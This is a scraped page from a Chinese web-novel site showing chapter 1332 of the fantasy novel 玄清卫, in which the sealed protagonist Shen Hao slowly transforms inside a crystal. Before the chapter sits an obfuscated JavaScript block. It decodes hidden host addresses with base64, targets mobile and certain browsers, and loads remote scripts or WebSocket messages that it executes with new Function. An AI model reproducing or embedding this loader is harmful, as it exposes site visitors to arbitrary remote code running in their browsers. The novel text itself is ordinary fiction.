笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第1332章 改变
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第1332章 改变

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  
  不过只有极少数人知道沈浩应该还活着,活在已经毒瘴浓度恢复的枉死城地宫之内。
  
  ......
  
  枉死城,地宫,天字号甲坑。
  
  最中心的位置,还是那处隐秘在迷宫里的巨大奇型建筑内,毒瘴已经恢复到了正常的状态,浓郁得如同弥散在空中的厚雾,视野已经偏墨绿色了。这种毒瘴之中即便是杨青志这种玄海境后境的修士再配合青玉丸也完全抵挡不住。
  
  可就是在如此恶劣的环境里,中间大厅内却依旧有着细细的呼吸声在有规律的起伏。
  
  循着这呼吸声的源头,乃是一块暗红色的奇型物体,高两丈余,如水晶,整体看起来就像一个长得不太规矩的桃子。
  
  只不过这个“桃子”里镶嵌了一个人,一个左手剑右手刀,一身锦袍,看起来三十出头的男人。
  
  这个被镶嵌在晶石“桃子”里的男人自然就是地宫外吵得沸沸扬扬的沈浩了。
  
  正如杨善和杨青志两兄弟笃定的那样,沈浩的确还活着,那胸口起伏,呼吸虽然微弱且缓慢,但实实在在生机尚存。而也正是沈浩的呼吸动作可以看出那颗晶石“桃子”虽然看上去是实打实的实心,可实际上内部却是软的,果冻一般,甚至不影响沈浩的呼吸,还刚好将周围浓郁的毒瘴也给隔绝掉了。
  
  不过沈浩虽然的确活着,但他看起来似乎正处于一种神志游离的状态。
  
  其实如果再深入的观察的话也能发现沈浩如今这幅模样下他的身体并没有如他的神志一样游离,而是处在一种很玄妙的修行当中。
  
  此时的沈浩,他体内不论是经脉还是血肉骨骼,甚至是他的魂魄都在一分一分的慢慢壮大,而下丹田里的那枚覆盖了龙纹的“丹”,也保持着时时刻刻的有规律的颤动,以一种肉眼难辨的速度慢慢变得更加凝视更有规模。
  
  甚至于此时的沈浩各方面都比他自己静心修行是的精进速度更快了数倍,就好像无数的优质能量在无间隙的补益他一般。
  
  而沈浩之前一直很在意的身上覆盖的那种鳞片纹路此时已经全都缩回了胸口的黑兽纹身当中。但仔细看的话可以发现他的皮肤上虽然没有了鳞片纹路但却多了一片时隐时现的暗红色线条,密密麻麻的浮现时会形成一些奇异的符号,一如之前沈浩在迷宫里发现的那些石块上的不知名符号一模一样。
  
  当然,沈浩身上变化最大的还是黑兽纹身。
  
  以往黑兽纹身就算是“活灵活现”而已,看上去还是一个“纹身”。但此时,黑兽纹身的双眼灵动得可以时不时的眨巴两下,是真真正正的活了过来。
  
  沈浩也好,黑兽纹身也罢,似乎都在这处大厅里寂静的飞速改变着。时间也变得没有痕迹,一天又一天飞逝而去......
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师